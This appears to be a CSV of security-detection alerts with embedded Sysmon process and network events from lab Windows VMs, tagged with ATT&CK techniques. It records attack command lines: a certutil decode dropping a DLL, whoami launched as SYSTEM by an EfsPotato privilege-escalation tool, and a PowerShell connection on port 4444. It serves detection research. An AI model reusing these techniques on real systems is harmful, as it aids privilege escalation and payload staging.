<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-7D86-5CD5-0000-0010CC2E1400</Data>
<Data Name=""ParentProcessId"">2076</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-22T19:33:38.905645Z"">
</TimeCreated>
<EventRecordID>1912935</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4760"" ThreadID=""6844"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-22 19:33:38.890</Data>
<Data Name=""ProcessGuid"">00247C92-A692-6122-0000-0010A5CD1F02</Data>
<Data Name=""ProcessId"">11328</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.19041.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\WINDOWS\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">00247C92-7087-6122-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">00247C92-A691-6122-0000-001021C31F02</Data>
<Data Name=""ParentProcessId"">14048</Data>
<Data Name=""ParentImage"">C:\temp\EfsPotato.exe</Data>
<Data Name=""ParentCommandLine"">c:\temp\EfsPotato.exe whoami</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil -f -decode fi.b64 AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:58.659405Z"">
</TimeCreated>
<EventRecordID>4888</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:58.614</Data>
<Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
<Data Name=""ProcessId"">3184</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-10T13:32:58.549885Z"">
</TimeCreated>
<EventRecordID>15677</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1948"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-10 13:32:54.034</Data>
<Data Name=""ProcessGuid"">365ABB72-7D86-5CD5-0000-0010CC2E1400</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-79DF-5CD5-0000-0020F8410100</Data>
<Data Name=""LogonId"">0x141f8</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-7D85-5CD5-0000-001047061400</Data>
<Data Name=""ParentProcessId"">2536</Data>
<Data Name=""ParentImage"">C:\Windows\System32\CompMgmtLauncher.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\CompMgmtLauncher.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-20T08:07:52.956810Z"">
</TimeCreated>
<EventRecordID>8119</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2020"" ThreadID=""2088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-20 08:07:52.956</Data>
<Data Name=""ProcessGuid"">365ABB72-3ED8-5D0B-0000-0010398F1A00</Data>
<Data Name=""ProcessId"">1476</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
<Data Name=""LogonId"">0x13529</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3ED4-5D0B-0000-0010B2871A00</Data>
<Data Name=""ParentProcessId"">1440</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;cmd&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /groups) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:48.290682Z"">
</TimeCreated>
<EventRecordID>17715</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:48.290</Data>
<Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-00103A6B1300</Data>
<Data Name=""ProcessId"">2676</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /groups</Data>
<Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
<Data Name=""LogonId"">0x13587</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
<Data Name=""ParentProcessId"">2016</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /groups ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:48.290682Z"">
</TimeCreated>
<EventRecordID>17715</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:48.290</Data>
<Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-00103A6B1300</Data>
<Data Name=""ProcessId"">2676</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /groups</Data>
<Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
<Data Name=""LogonId"">0x13587</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
<Data Name=""ParentProcessId"">2016</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:57.633157Z"">
</TimeCreated>
<EventRecordID>4887</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:57.600</Data>
<Data Name=""ProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ProcessId"">1208</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6056-5D3F-0000-0010C9EF4100</Data>
<Data Name=""ParentProcessId"">4600</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:08.143703Z"">
</TimeCreated>
<EventRecordID>342417</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:08.141</Data>
<Data Name=""ProcessGuid"">747F3D96-E940-5F33-0000-001039310F00</Data>
<Data Name=""ProcessId"">7460</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E93C-5F33-0000-0010A6F00E00</Data>
<Data Name=""ParentProcessId"">8032</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 38208 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-20T08:07:50.378685Z"">
</TimeCreated>
<EventRecordID>8118</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2020"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-20 08:07:48.721</Data>
<Data Name=""ProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
<Data Name=""ProcessId"">816</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">false</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.13</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">4444</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.18</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">38208</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-24T01:13:54.120170Z"">
</TimeCreated>
<EventRecordID>196375</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2812"" ThreadID=""3656"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-24 01:13:54.117</Data>
<Data Name=""ProcessGuid"">747F3D96-CA52-5EC9-0000-001027FA3700</Data>
<Data Name=""ProcessId"">4456</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-BDD1-5EC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-CA4E-5EC9-0000-00109FE23700</Data>
<Data Name=""ParentProcessId"">1516</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T07:26:35.182896Z"">
</TimeCreated>
<EventRecordID>5637</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 07:26:35.116</Data>
<Data Name=""ProcessGuid"">747F3D96-88AB-5D46-0000-001081ED7D03</Data>
<Data Name=""ProcessId"">4300</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-88AA-5D46-0000-001093E37D03</Data>
<Data Name=""ParentProcessId"">4644</Data>
<Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
